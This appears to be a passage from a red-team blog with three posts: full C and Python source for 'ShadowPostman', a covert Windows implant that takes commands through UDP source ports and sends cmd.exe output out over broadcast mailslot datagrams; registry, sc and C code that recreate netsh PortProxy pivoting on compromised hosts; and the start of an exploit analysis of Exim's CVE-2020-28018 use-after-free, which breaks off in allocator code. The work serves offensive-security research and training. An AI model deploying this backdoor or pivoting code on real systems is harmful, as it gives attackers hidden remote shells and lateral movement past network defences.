In the article our owl explained how some β€œclean boxes” are left behind until its retake is needed. When the Red Team needs to reactivate the communication with its implant they just β€œknock” on a few predefined ports and the implant wakes up again. To do this the implant uses the Windows Filtering Platform APIs in order to monitor the firewall events and to check for incomming UDP packets (source and destionation port/ip), if the predefined condition is met then it connects back to a fallback C2 or just fire a reverse shell.

Here, in our PoC, we are going to use this technique partially. As we do not want to β€œcreate” a socket in the compromised machine, and we need to communicate with our implant in some way, we use a wicked approach based on Port Knocking. Or we should call it β€œreverse” Port Knocking.

Instead of β€œknocking” at different ports, we β€œknock” only in a port but we change the source port. And this source port is our covert-channel: we can use those two bytes to transmit information. So here is the thing… the events collected from WFP are our inbound channel.

We just found a way to transmit information to our implant, but how are we going to exfiltrate the output of our inputs/commands? Well, here is where Mailslots take in action. From Microsoft:

A mailslot is a mechanism for one-way interprocess communications (IPC). Applications can store messages in a mailslot. (...). These messages are typically sent over a network to either a specified computer **or to all computers in a specified domain**. (...)


(...) Mailslots, on the other hand, are a simple way for a process to broadcast messages to multiple processes. One important consideration is that mailslots broadcast messages using datagrams. A datagram is a small packet of information that the network sends along the wire. Like a radio or television broadcast, a datagram offers no confirmation of receipt; there is no way to guarantee that a datagram has been received.(...)

Ok, we can use mailslots to broadcast the output over the network and then wait patiently in our end in order to read the output. Where is the fun? Well… every Windows is using mailslots continously. Your machine is broadcasting datagrams like a minigun. Have you ever found those β€œBROWSER” packets in Wireshark?

BROWSER request broadcasted
BROWSER request broadcasted.

Yep, the CIFS Browser protocol uses the mailslot \MAILSLOT\BROWSE, so we can smuggle the output of our shell here. This is gonna be our outbound channel.

After this brief introduction, let’s dig a bit!

Inbound channel

As first contact we can reuse the code to monitor the events and add a minor edit to print the source ports:

#include <windows.h>
#include <fwpmtypes.h>
#include <fwpmu.h>
#include <stdio.h>
#include <winsock.h>

#pragma comment (lib, "fwpuclnt.lib")
#pragma comment (lib, "Ws2_32.lib")

#define EXIT_ON_ERROR(err) if((err) != ERROR_SUCCESS) {goto CLEANUP;}


FILETIME ft;






DWORD InitFilterConditions(
	__in_opt PCWSTR appPath,
	__in_opt const SOCKADDR* localAddr,
	__in_opt UINT8 ipProtocol,
	__in UINT32 numCondsIn,
	__out_ecount_part(numCondsIn, *numCondsOut) FWPM_FILTER_CONDITION0* conds,
	__out UINT32* numCondsOut,
	__deref_out FWP_BYTE_BLOB** appId
)
{
	*numCondsOut = 0;
	return ERROR_SUCCESS;
}


DWORD FindRecentEvents(
	__in HANDLE engine,
	__in_opt PCWSTR appPath,
	__in_opt const SOCKADDR* localAddr,
	__in_opt UINT8 ipProtocol,
	__in UINT32 seconds,
	__deref_out_ecount(*numEvents) FWPM_NET_EVENT0*** events,
	__out UINT32* numEvents
)
{
	DWORD result = ERROR_SUCCESS;
	FWPM_NET_EVENT_ENUM_TEMPLATE0 enumTempl;
	ULARGE_INTEGER ulTime;
	FWPM_FILTER_CONDITION0 conds[4];
	UINT32 numConds;
	FWP_BYTE_BLOB* appBlob = NULL;
	HANDLE enumHandle = NULL;

	memset(&enumTempl, 0, sizeof(enumTempl));

	// Use the current time as the end time of the window.
	GetSystemTimeAsFileTime(&(enumTempl.endTime));

	// Subtract the number of seconds specified by the caller to find the start
	// time.
	ulTime.LowPart = enumTempl.endTime.dwLowDateTime;
	ulTime.HighPart = enumTempl.endTime.dwHighDateTime;
	ulTime.QuadPart -= seconds * 10000000ui64;
	enumTempl.startTime.dwLowDateTime = ulTime.LowPart;
	enumTempl.startTime.dwHighDateTime = ulTime.HighPart;

	result = InitFilterConditions(
		appPath,
		&localAddr,
		ipProtocol,
		ARRAYSIZE(conds),
		conds,
		&numConds,
		&appBlob
	);
	EXIT_ON_ERROR(result);

	enumTempl.numFilterConditions = numConds;
	if (numConds > 0)
	{
		enumTempl.filterCondition = conds;
	}

	result = FwpmNetEventCreateEnumHandle0(
		engine,
		&enumTempl,
		&enumHandle
	);
	EXIT_ON_ERROR(result);

	result = FwpmNetEventEnum0(
		engine,
		enumHandle,
		INFINITE,
		events,
		numEvents
	);
	EXIT_ON_ERROR(result);

CLEANUP:
	FwpmNetEventDestroyEnumHandle0(engine, enumHandle);
	FwpmFreeMemory0((void**)&appBlob);
	return result;
}

LPSTR detectHit(void) {
	struct in_addr rinaddr;
	HANDLE engineHandle = 0;
	FWPM_NET_EVENT0** events = NULL, * event;
	UINT32 numEvents = 0, i;


	static const char* const types[] =
	{
	   "FWPM_NET_EVENT_TYPE_IKEEXT_MM_FAILURE",
	   "FWPM_NET_EVENT_TYPE_IKEEXT_QM_FAILURE",
	   "FWPM_NET_EVENT_TYPE_IKEEXT_EM_FAILURE",
	   "FWPM_NET_EVENT_TYPE_CLASSIFY_DROP",
	   "FWPM_NET_EVENT_TYPE_IPSEC_KERNEL_DROP"
	};
	const char* type;

	// Use dynamic sessions for efficiency and safety:
	//  - All objects associated with the dynamic session are deleted with one call.
	//  - Filtering policy objects are deleted even when the application crashes. 
	FWPM_SESSION0 session;
	memset(&session, 0, sizeof(session));
	session.flags = FWPM_SESSION_FLAG_DYNAMIC;

	DWORD result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_WINNT, NULL, &session, &engineHandle);
	if (ERROR_SUCCESS == result)
	{
		result = FindRecentEvents(
			engineHandle,
			0,
			0,
			0,
			100,
			&events,
			&numEvents
		);
	}

	if (numEvents != 0)
	{
		
		for (i = 0; i < numEvents; ++i)
		{
			event = events[i];


			type = (event->type < ARRAYSIZE(types)) ? types[event->type]
				: "<unknown>";

			if (event->header.ipVersion == FWP_IP_VERSION_V4 && event->header.ipProtocol == IPPROTO_UDP
				&& (event->header.timeStamp.dwHighDateTime > ft.dwHighDateTime
					|| (event->header.timeStamp.dwHighDateTime == ft.dwHighDateTime && event->header.timeStamp.dwLowDateTime > ft.dwLowDateTime)
					)
				)
			{
				rinaddr.s_addr = htonl(event->header.remoteAddrV4);
				ft.dwHighDateTime = event->header.timeStamp.dwHighDateTime;
				ft.dwLowDateTime = event->header.timeStamp.dwLowDateTime;
				//printf("[%s] - %x - %x\n", inet_ntoa(rinaddr), event->header.localPort, event->header.remotePort);
				char partialOut[3] = { 0 };
				memcpy(partialOut, &event->header.remotePort, 2);
				printf("%s", partialOut);
			}
		}
	}
}





int main(int argc, char** argv[]) {
	ft.dwHighDateTime = 0;
	ft.dwLowDateTime = 0;
	for (;;) {
		detectHit();
		Sleep(1000);
	}
	return 0;
}

Now we can try to send packets against a predefined port (for example, 123/UDP), encoding a message inside the source ports. Keep in mind that we don’t care about the content because our information is carried as the source port (this means: please, try to make the payload as similar as possible to a real and β€œregular” packet based in the protocol that you are trying to simulate).

 import sys
 from scapy.all import *
 
 
 def textToPorts(text):
     chunks = [text[i:i+2] for i in range(0, len(text), 2)]
     for chunk in chunks:
         send(IP(dst=sys.argv[1])/UDP(dport=123,sport=int("0x" + chunk[::-1].encode("hex"), 16))/Raw(load="Use stealthier packet in a real operation, pls"))
 
 if __name__ == "__main__":
     while 1:
         command = raw_input("Insert text> ")
         textToPorts(command)

We can see how it worked like a charm:

Text message retrieved from the events
Text message retrieved from the events (open it to see it with the whole size).

Right now we can listen without ears sockets. Let’s move to the next task!

Outbound channel

Working with mailslots is pretty easy. We only need to open a handle to \\*\MAILSLOT\BROWSE and write inside it like we do with regular files. The \\*\ indicates that the message has to be broadcasted to the whole domain.

As any protocol, we have to keep some kind of β€œstructure” to avoid crafting a malformed packet in excess. Luckily for us, CIFS BROWSER protocol is very lazy and we can find a suitable request easy. To look for our candidates we can just loop from 0x00 to 0xFF and write it over the handle:

#include <windows.h>
#include <stdio.h>

int main(int argc, char** argv) {
	HANDLE hMailslot = NULL;
	DWORD dwWritten;

	hMailslot = CreateFileA("\\\\*\\MAILSLOT\\BROWSE", GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
	for (int i = 0x00; i < 0xFF; i++) {
		char message[14] = { 0 };
		snprintf(message, 14, "%cHello World!",i);
		WriteFile(hMailslot, message, 14, &dwWritten, NULL);
	}
	CloseHandle(hMailslot);
	return 0;
}

As we can see most of the messages are interpreted as β€œmalformed packets” or are undefined in the protocol standard:

Looping through operation codes
Looping through operation codes.

The best candidate looks like to be the GetBackupListRequest command. It uses the 0x09 as opcode:

GetBackupListRequest description
GetBackupListRequest description.

To retrieve the information at our end we can sniff the network using Scapy:

# ...
 def getPacket(pkt):
         needle = "BROWSE\x00\x00\x00\x09"
         data = pkt[Raw].load
         if needle in data:
                 sys.stdout.write(data[data.find(needle) + len(needle):])
                 sys.stdout.flush()
 
 def monitor():
         sniff(prn=getPacket, filter="port 138 and host " + sys.argv[1], iface=sys.argv[2])
# ...

Interlude

Before continuing we need to clarify some points that are to be taken into consideration. The most important: this kind of approach will only work if there is no network elements that could mask the source port. In complex infrastructures you need to be close (usually in the same network segment) in order to perform this technique. If a NAT-like device sits between you and the sleeping box it is most likely that the information encoded as source port is going to be overwritten.

Secondly, in our PoC we are just using one port to transfer the information for the sake of brevity. In a real implant, you need to knock at least three different ports:

  • First port to wake up, create the cmd.exe child process and to enter in β€œshell” mode
  • Second port to read the inputs (as we are doing right now)
  • Third port to stop the β€œshell” mode and enter in sleeping mode again

Also something really, really, really important: when the first port is hit (the β€œwake up”) we have to save the IP which contacted us, and then use it as criteria to meet in our events of reading inputs. This matters a lot to avoid the insertion of corrupted data because we are reading stray packets from other machines. We need to match the port choosen to carry the input AND the IP who made us wake up.

For this very same reason to wake up we need to add an extra condition: not only a selected port has to be knocked, the source port has to be one that would not be used in a natural environment (for example 666).

Lastly we have to keep in mind that mailslots are size limited. We only can send 424 bytes per message.

PoC || GTFO

After all this chit-chat let’s play a bit with our shitty PoC. Here comes the client:

 # PoC by Juan Manuel Fernandez (@TheXC3LL)
 
 import sys
 import threading
 from scapy.all import *
 
 
 
 def textToPorts(text):
         chunks = [text[i:i+2] for i in range(0, len(text), 2)]
         for chunk in chunks:
                 send(IP(dst=sys.argv[1])/UDP(dport=123,sport=int("0x" + chunk[::-1].encode("hex"), 16))/Raw(load="Adepts of 0xCC here to make some noise, avoid this kind of obvious malformed packet with stupid messages ;)"), verbose=False)
 
 def getPacket(pkt):
         needle = "BROWSE\x00\x00\x00\x09"
         data = pkt[Raw].load
         if needle in data:
                 sys.stdout.write(data[data.find(needle) + len(needle):])
                 sys.stdout.flush()
 
 def monitor():
         sniff(prn=getPacket, filter="port 138 and host " + sys.argv[1], iface=sys.argv[2])
 
 if __name__ == "__main__":
         x = threading.Thread(target=monitor)
         x.start()
         while 1:
                 command = raw_input()
                 textToPorts(command + "\r\n")

And here the other part:

/* PoC by Juan Manuel Fernandez (@TheXC3LL) */

#include <windows.h>
#include <fwpmtypes.h>
#include <fwpmu.h>
#include <stdio.h>
#include <winsock.h>


#pragma comment (lib, "fwpuclnt.lib")
#pragma comment (lib, "Ws2_32.lib")

#define EXIT_ON_ERROR(err) if((err) != ERROR_SUCCESS) {goto CLEANUP;}

#define BUFFER_SIZE 400

FILETIME ft;




struct child_pipes {
	HANDLE child_IN_R;
	HANDLE child_IN_W;
	HANDLE child_OUT_R;
	HANDLE child_OUT_W;
};

typedef struct child_pipes child_pipes;


DWORD InitFilterConditions(
	__in_opt PCWSTR appPath,
	__in_opt const SOCKADDR* localAddr,
	__in_opt UINT8 ipProtocol,
	__in UINT32 numCondsIn,
	__out_ecount_part(numCondsIn, *numCondsOut) FWPM_FILTER_CONDITION0* conds,
	__out UINT32* numCondsOut,
	__deref_out FWP_BYTE_BLOB** appId
)
{
	*numCondsOut = 0;
	return ERROR_SUCCESS;
}


DWORD FindRecentEvents(
	__in HANDLE engine,
	__in_opt PCWSTR appPath,
	__in_opt const SOCKADDR* localAddr,
	__in_opt UINT8 ipProtocol,
	__in UINT32 seconds,
	__deref_out_ecount(*numEvents) FWPM_NET_EVENT0*** events,
	__out UINT32* numEvents
)
{
	DWORD result = ERROR_SUCCESS;
	FWPM_NET_EVENT_ENUM_TEMPLATE0 enumTempl;
	ULARGE_INTEGER ulTime;
	FWPM_FILTER_CONDITION0 conds[4];
	UINT32 numConds;
	FWP_BYTE_BLOB* appBlob = NULL;
	HANDLE enumHandle = NULL;

	memset(&enumTempl, 0, sizeof(enumTempl));

	// Use the current time as the end time of the window.
	GetSystemTimeAsFileTime(&(enumTempl.endTime));

	// Subtract the number of seconds specified by the caller to find the start
	// time.
	ulTime.LowPart = enumTempl.endTime.dwLowDateTime;
	ulTime.HighPart = enumTempl.endTime.dwHighDateTime;
	ulTime.QuadPart -= seconds * 10000000ui64;
	enumTempl.startTime.dwLowDateTime = ulTime.LowPart;
	enumTempl.startTime.dwHighDateTime = ulTime.HighPart;

	result = InitFilterConditions(
		appPath,
		&localAddr,
		ipProtocol,
		ARRAYSIZE(conds),
		conds,
		&numConds,
		&appBlob
	);
	EXIT_ON_ERROR(result);

	enumTempl.numFilterConditions = numConds;
	if (numConds > 0)
	{
		enumTempl.filterCondition = conds;
	}

	result = FwpmNetEventCreateEnumHandle0(
		engine,
		&enumTempl,
		&enumHandle
	);
	EXIT_ON_ERROR(result);

	result = FwpmNetEventEnum0(
		engine,
		enumHandle,
		INFINITE,
		events,
		numEvents
	);
	EXIT_ON_ERROR(result);

CLEANUP:
	FwpmNetEventDestroyEnumHandle0(engine, enumHandle);
	FwpmFreeMemory0((void**)&appBlob);
	return result;
}

void getCommand(struct child_pipes* pipes) {
	struct in_addr rinaddr;
	HANDLE engineHandle = 0;
	FWPM_NET_EVENT0** events = NULL, * event;
	UINT32 numEvents = 0, i;


	static const char* const types[] =
	{
	   "FWPM_NET_EVENT_TYPE_IKEEXT_MM_FAILURE",
	   "FWPM_NET_EVENT_TYPE_IKEEXT_QM_FAILURE",
	   "FWPM_NET_EVENT_TYPE_IKEEXT_EM_FAILURE",
	   "FWPM_NET_EVENT_TYPE_CLASSIFY_DROP",
	   "FWPM_NET_EVENT_TYPE_IPSEC_KERNEL_DROP"
	};
	const char* type;

	// Use dynamic sessions for efficiency and safety:
	//  - All objects associated with the dynamic session are deleted with one call.
	//  - Filtering policy objects are deleted even when the application crashes. 
	FWPM_SESSION0 session;
	memset(&session, 0, sizeof(session));
	session.flags = FWPM_SESSION_FLAG_DYNAMIC;

	DWORD result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_WINNT, NULL, &session, &engineHandle);
	if (ERROR_SUCCESS == result)
	{
		result = FindRecentEvents(
			engineHandle,
			0,
			0,
			0,
			100,
			&events,
			&numEvents
		);
	}

	if (numEvents != 0)
	{

		for (i = 0; i < numEvents; ++i)
		{
			event = events[i];


			type = (event->type < ARRAYSIZE(types)) ? types[event->type]
				: "<unknown>";

			if (event->header.ipVersion == FWP_IP_VERSION_V4 && event->header.ipProtocol == IPPROTO_UDP
				&& (event->header.timeStamp.dwHighDateTime > ft.dwHighDateTime
					|| (event->header.timeStamp.dwHighDateTime == ft.dwHighDateTime && event->header.timeStamp.dwLowDateTime > ft.dwLowDateTime)
					)
				)
			{
				rinaddr.s_addr = htonl(event->header.remoteAddrV4);
				ft.dwHighDateTime = event->header.timeStamp.dwHighDateTime;
				ft.dwLowDateTime = event->header.timeStamp.dwLowDateTime;
				//printf("[%s] - %x - %x\n", inet_ntoa(rinaddr), event->header.localPort, event->header.remotePort);
				char partialOut[3] = { 0 };
				memcpy(partialOut, &event->header.remotePort, 2);
				printf("%s", partialOut);
				write_to_pipe(pipes->child_IN_W, partialOut);
			}
		}
	}
}



struct child_pipes* setup_pipes(void) {
	struct child_pipes* pipes = NULL;
	SECURITY_ATTRIBUTES saAttr;

	saAttr.nLength = sizeof(SECURITY_ATTRIBUTES);
	saAttr.bInheritHandle = TRUE;
	saAttr.lpSecurityDescriptor = NULL;

	pipes = (child_pipes*)malloc(sizeof(child_pipes));

	if (!CreatePipe(&pipes->child_OUT_R, &pipes->child_OUT_W, &saAttr, 0)) {
		return -1;
	}
	if (!CreatePipe(&pipes->child_IN_R, &pipes->child_IN_W, &saAttr, 0)) {
		return -1;
	}
	if (!SetHandleInformation(pipes->child_OUT_R, HANDLE_FLAG_INHERIT, 0)) {
		return -1;
	}
	if (!SetHandleInformation(pipes->child_IN_W, HANDLE_FLAG_INHERIT, 0)) {
		return -1;
	}
	return pipes;
}

void release_pipes(struct child_pipes* pipes) {
	free(pipes);
}


int read_from_pipe(HANDLE pipe, LPSTR buff) {
	BOOL bSuccess;
	DWORD read;
	if (!PeekNamedPipe(pipe, NULL, 0, NULL, &read, NULL)) {
		return -1;
	}
	if (read) {
		bSuccess = ReadFile(pipe, buff, BUFFER_SIZE, &read, NULL);
		if (!bSuccess) {
			return -1;
		}
	}
	return read;
}

int write_to_pipe(HANDLE pipe, LPSTR buff) {
	BOOL bSuccess;
	DWORD written;
	bSuccess = WriteFile(pipe, buff, strlen(buff), &written, NULL);
	if (!bSuccess) {
		return -1;
	}
	return written;
}


int create_childprocess(LPSTR binary, struct child_pipes* pipes) {
	PROCESS_INFORMATION piProcInfo;
	STARTUPINFOA siStartInfo = { 0 };
	BOOL bSuccess = FALSE;

	siStartInfo.cb = sizeof(STARTUPINFOA);
	siStartInfo.hStdError = pipes->child_OUT_W;
	siStartInfo.hStdOutput = pipes->child_OUT_W;
	siStartInfo.hStdInput = pipes->child_IN_R;
	siStartInfo.dwFlags |= STARTF_USESTDHANDLES;
	bSuccess = CreateProcessA(NULL,
		binary,
		NULL,
		NULL,
		TRUE,
		0,
		NULL,
		NULL,
		&siStartInfo,
		&piProcInfo
	);
	if (!bSuccess) {
		return -1;
	}

	CloseHandle(pipes->child_OUT_W);
	CloseHandle(pipes->child_IN_R);

	return piProcInfo.hProcess;
}

void sendOutput(LPSTR output, HANDLE hMailslot) {
	char message[BUFFER_SIZE + 2] = { 0 };
	DWORD dwWritten = 0;

	snprintf(message, BUFFER_SIZE + 2, "\x09%s", output);
	
	WriteFile(hMailslot, message, strlen(message) + 1, &dwWritten, NULL);
	return;
}


int main(int argc, char** argv[]) {
	ft.dwHighDateTime = 0;
	ft.dwLowDateTime = 0;
	int status = 0;
	char buffer_stdout[BUFFER_SIZE + 1] = { 0 };
	struct child_pipes* pipes = NULL;
	int process = 0;
	HANDLE hMailslot = NULL;

	pipes = setup_pipes();
	hMailslot = CreateFileA("\\\\*\\MAILSLOT\\BROWSE", GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

	if ((process = create_childprocess("C:\\windows\\system32\\cmd.exe", pipes)) == -1) {
		release_pipes(pipes);
		return -1;
	}
	while (1) {
		GetExitCodeProcess(process, &status);
		if (status != STILL_ACTIVE) {
			break;
		}
		do {
			memset(buffer_stdout, 0, sizeof(buffer_stdout));
			status = read_from_pipe(pipes->child_OUT_R, buffer_stdout);
			if (status == -1) {
				break;
			}
			else {
				if (strlen(buffer_stdout) != 0) {
					sendOutput(buffer_stdout, hMailslot);
				}
			}
		} while (status != 0);
		Sleep(300);
		getCommand(pipes);
	}

	return 0;
}

Execute the python script in your linux machine, and then fire the executable in the Windows machine as a privileged user. A shell should arrive :):

ShadowPostman PoC working :D
ShadowPostman PoC working :D.

EoF

We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.

Don’t use commands, use code: the tale of Netsh & PortProxy

11 June 2021 at 00:00

Dear Fellowlship, today’s homily is a call to an (un)holy crusade: we have to banish the usage of commands in compromised machines and start to embrace coding. Please, take a seat and listen to the story of netsh and PortProxy.

Prayers at the foot of the Altar a.k.a. disclaimer

The intention of this short article is to encourage people to improve their tradecraft. We use netsh here as a mere example to transmit the core idea: we need to move from commands to tasks coded in our implants/tools.

Introduction

There are tons of ways to tunnel your traffic through a compromised machine. Probably the most common can be dropping an implant that implements a SOCKS4/5 proxy, so you can route your traffic through that computer and run your tools against other network segments previously inaccessible. But in some scenarios we can’t just deploy our socks proxy listening to an arbitrary port and we need to rely on native tools, like the well-known netsh.

Forwarding traffic from one port to another machine is trivial with netsh. For example, if we want to connect to the RDP service exposed by a server (let’s call it C) at 10.2.0.12 and we need to use B (10.1.0.233) as pivot, the command line would look like:

netsh interface portproxy add v4tov4 listenport=1337 listenaddress=0.0.0.0 connectport=3389 connectaddress=10.2.0.12

Then we only need to use our favorite RDP client and point it to B (10.1.0.233) at port 1337. Easy peachy.

But… how netsh works and what is happening under the hood? Can we implement this functionality by ourselves so we can avoid the use of the well-known netsh?

Shedding light

The first thing to do (after googling) when we have to play with something in Windows is to take a look at ReactOS and Wine projects (usually both are a goldmine) but this time we were unlucky:

#include "wine/debug.h"

WINE_DEFAULT_DEBUG_CHANNEL(netsh);

int __cdecl wmain(int argc, WCHAR *argv[])
{
    int i;

    WINE_FIXME("stub:");
    for (i = 0; i < argc; i++)
        WINE_FIXME(" %s", wine_dbgstr_w(argv[i]));
    WINE_FIXME("\n");

    return 0;
}

So let’s try to execute netsh and take a look at it with Process Monitor:

Netsh setting a registry value
Netsh setting a registry value.

In Process Monitor the only thing that is related to β€œPortProxy” is the creation of a value with the forwarding info (source an destination) inside the key HKLM\SYSTEM\ControlSet001\Services\PortProxy\v4tov4\tcp. If we google this key we can find a lot of articles talking about DFIR and how this key can be used to detect this particular TTP in forensic analysis (for example: Port Proxy detection - How can we see port proxy configurations in DFIR?).

If we create manually this registry value nothing happens, so we need something more to trigger the proxy creation. What are we missing? Well, that question is easy to answer. Let’s see what happened with our previous netsh execution with TCPView:

svchost and iphlpsvc reference
Svchost and iphlpsvc reference.

As we can see iphlpsvc (IP Helper Service) is in charge to create the β€œportproxy”. So netsh should β€œcontact” this service in order to trigger the proxy creation, but how is this done? We should open iphlpsvc.dll inside Binary Ninja and look for references to β€œPortProxy”. (Spoiler: it is using the paramchange control code, so we can trigger it with sc easily)

Reference to a registry key with 'PortProxy' word inside
Reference to a registry key with 'PortProxy' word inside

We have a hit with a registry key similar to the one that we were looking for…

Function chunk that references the registry key found
Function chunk that references the registry key found

…so we can start the old and dirty game of following the call cascade (cross-reference party!) until we reach something really interesting (Note: OnConfigChange is a function renamed by us):

String with the words ServiceHandler and SERVICE_CONTROL_PARAMCHANGE
String with the words ServiceHandler and SERVICE_CONTROL_PARAMCHANGE

We got it! If a paramchange control code arrives to the iphlpsvc, it is going to read again the PortProxy configuration from the registry and act according to the info retrieved.

We can translate netsh PortProxy into the creation of a registry key and then sending a paramchange control code to the IP Helper service, or in other words we can execute these commands:

reg add HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PortProxy\v4tov4\tcp /t REG_SZ /v 0.0.0.0/49777 /d 192.168.8.128/80
sc control iphlpsvc paramchange
reg delete HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PortProxy\v4tov4 /f 

From stone to steel

It’s time to translate our commands into a shitty PoC in C:

// PortProxy PoC
// @TheXC3LL

#include <Windows.h>
#include <stdio.h>


DWORD iphlpsvcUpdate(void) {
	SC_HANDLE hManager;
	SC_HANDLE hService;
	SERVICE_STATUS serviceStatus;
	DWORD retStatus = 0;
	DWORD ret = -1;

	hManager = OpenSCManagerA(NULL, NULL, GENERIC_READ);
	if (hManager) {
		hService = OpenServiceA(hManager, "IpHlpSvc", SERVICE_PAUSE_CONTINUE | SERVICE_QUERY_STATUS);
		if (hService) {
			printf("[*] Connected to IpHlpSvc\n");
			retStatus = ControlService(hService, SERVICE_CONTROL_PARAMCHANGE, &serviceStatus);
			if (retStatus) {
				printf("[*] Configuration update requested\n");
				ret = 0;
			}
			else {
				printf("[!] ControlService() failed!\n");
			}
			CloseServiceHandle(hService);
			CloseServiceHandle(hManager);
			return ret;
		}
		CloseServiceHandle(hManager);
		printf("[!] OpenServiceA() failed!\n");
		return ret;
	}
	printf("[!] OpenSCManager() failed!\n");
	return ret;
}

DWORD addEntry(LPSTR source, LPSTR destination) {
	LPCSTR v4tov4 = "SYSTEM\\ControlSet001\\Services\\PortProxy\\v4tov4\\tcp";
	HKEY hKey = NULL;
	LSTATUS retStatus = 0;
	DWORD ret = -1;
	
	retStatus = RegCreateKeyExA(HKEY_LOCAL_MACHINE, v4tov4, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
	if (retStatus == ERROR_SUCCESS) {
		retStatus = (RegSetValueExA(hKey, source, 0, REG_SZ, (LPBYTE)destination, strlen(destination) + 1));
		if (retStatus == ERROR_SUCCESS) {
			printf("[*] New entry added\n");
			ret = 0;
		}
		else {
			printf("[!] RegSetValueExA() failed!\n");
		}
		RegCloseKey(hKey);
		return ret;
	}
	printf("[!] RegCreateKeyExA() failed!\n");
	return ret;
}

DWORD deleteEntry(LPSTR source) {
	LPCSTR v4tov4 = "SYSTEM\\ControlSet001\\Services\\PortProxy\\v4tov4\\tcp";
	HKEY hKey = NULL;
	LSTATUS retStatus = 0;
	DWORD ret = -1;

	retStatus = RegCreateKeyExA(HKEY_LOCAL_MACHINE, v4tov4, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
	if (retStatus == ERROR_SUCCESS) {
		retStatus = RegDeleteKeyValueA(HKEY_LOCAL_MACHINE, v4tov4, source);
		if (retStatus == ERROR_SUCCESS) {
			printf("[*] New entry deleted\n");
			ret = 0;
		}
		else {
			printf("[!] RegDeleteKeyValueA() failed!\n");
		}
		RegCloseKey(hKey);
		return ret;
	}
	printf("[!] RegCreateKeyExA() failed!\n");
	return ret;
}

int main(int argc, char** argv) {
	printf("\t\t-=<[ PortProxy PoC by @TheXC3LL ]>=-\n\n");
	if (argc <= 2) {
		printf("[!] Invalid syntax! Usage: PortProxy.exe SOURCE_IP/PORT DESTINATION_IP/PORT (example: ./PortProxy.exe 0.0.0.0/1337 10.0.2.2/22\n");
	}
	if (addEntry(argv[1], argv[2]) != -1) {
		if (iphlpsvcUpdate() == -1) {
			printf("[!] Something went wrong :S\n");
		}
		if (deleteEntry(argv[1]) == -1) {
				printf("[!] Troubles deleting the entry, please try it manually!!\n");
		}
	}
	return 0;
}

Fire in the hole!

Proof of Concept working like a charm
Proof of Concept working like a charm

EDIT (2021/06/19): A reader pointed us that β€œControl001” is the β€œnormal” controlset, but in some scenarios the number can change (002, 003, etc.) so instead of using it directly we should use HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet before.

EoF

As we stated at the beginning this short article is not about β€œnetsh” or the β€œPortProxy” functionality. We aim higher: we want to encourage you to stop using commands blindly and to start to dig inside what is doing your machine. Explore and learn the internals of everything you do on an red team operation or a pentest.

We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.

From theory to practice: analysis and PoC development for CVE-2020-28018 (Use-After-Free in Exim)

14 May 2021 at 00:00

Dear Fellowlship, today’s homily is about building a PoC for one of the vulnerabilities published by Qualys in Exim. Please, take a seat and listen to the story.

Introduction

Qualys recently released an advisory named β€œ21Nails” with 21 vulnerabilities discovered in Exim, some leading to LPE and RCE.

This post will analyze one of those vulnerabilities with CVE ID: CVE-2020-28018.

The vulnerability is a Use-After-Free (UAF) vulnerability on tls-openssl.c, that leads to Remote Code Execution.

This vulnerability is really powerful as it allows an attacker to craft important primitives to bypass memory protections like PIE or ASLR.

The primitives that this vulnerability can achieve are the following:

  • Info Leak: Leak heap pointers to bypass ASLR
  • Arbitrary read: Read arbitrary number of bytes on arbitrary location
  • write-what-where: Write arbitrary data on arbitrary locations

As you can see, those primitives are just what a remote attacker needs to bypass security protections.

First for this vulnerability to be triggered and exploited some requirements need to be met:

  • TLS is enabled
  • Instead of GnuTLS (the default unfortunately) OpenSSL has to be enabled.
  • The exim running is one of the vulnerable versions
  • X_PIPE_CONNECT should be disabled

First, to understand why does this vulnerability exists and how to exploit it, we need to understand the behaviour of the Exim Pool Allocator and the growable strings Exim uses.

Exim Pool Allocator

Exim pool allocator has different pools:

  • POOL_PERM: Allocations that are not released until the process finishes
  • POOL_MAIN: Allocations that can be freed
  • POOL_SEARCH: Lookup storage

A pool is a linked list of storeblock structures starting from the chainbase.

typedef struct storeblock {
  struct storeblock *next;
  size_t length;
} storeblock;

We can see it contains two entries:

  • next: Pointer to the next block within the linked list.
  • length: Length of current block.
void *
store_get_3(int size, const char *filename, int linenumber)
{

if (size % alignment != 0) size += alignment - (size % alignment);

if (size > yield_length[store_pool])
  {
  int length = (size <= STORE_BLOCK_SIZE)? STORE_BLOCK_SIZE : size;
  int mlength = length + ALIGNED_SIZEOF_STOREBLOCK;
  storeblock * newblock = NULL;

  if (  (newblock = current_block[store_pool])
     && (newblock = newblock->next)
     && newblock->length < length
     )
    {
    /* Give up on this block, because it's too small */
    store_free(newblock);
    newblock = NULL;
    }

  if (!newblock)
    {
    pool_malloc += mlength;           /* Used in pools */
    nonpool_malloc -= mlength;        /* Exclude from overall total */
    newblock = store_malloc(mlength);
    newblock->next = NULL;
    newblock->length = length;
    if (!chainbase[store_pool])
      chainbase[store_pool] = newblock;
    else
      current_block[store_pool]->next = newblock;
    }

  current_block[store_pool] = newblock;
  yield_length[store_pool] = newblock->length;
  next_yield[store_pool] =
    (void *)(CS current_block[store_pool] + ALIGNED_SIZEOF_STOREBLOCK);
  (void) VALGRIND_MAKE_MEM_NOACCESS(next_yield[store_pool], yield_length[store_pool]);
  }


store_last_get[store_pool] = next_yield[store_pool];

...

next_yield[store_pool] = (void *)(CS next_yield[store_pool] + size);
yield_length[store_pool] -= size;

return store_last_get[store_pool];
}

When store_get() is called it first checks if there is enough space on the current block to satisfy the request.

If there is space, the yield pointer is updated and a pointer to the memory is returned to the caller funcion.

If there is no space it checks if there is a free block, and then at the last try, call malloc() to satisfy the request (the requirement is a minimum of STORE_BLOCK_SIZE, if less than that, it will be used as the size for the allocation).

Finally the new block is added to the pool linked list.

void
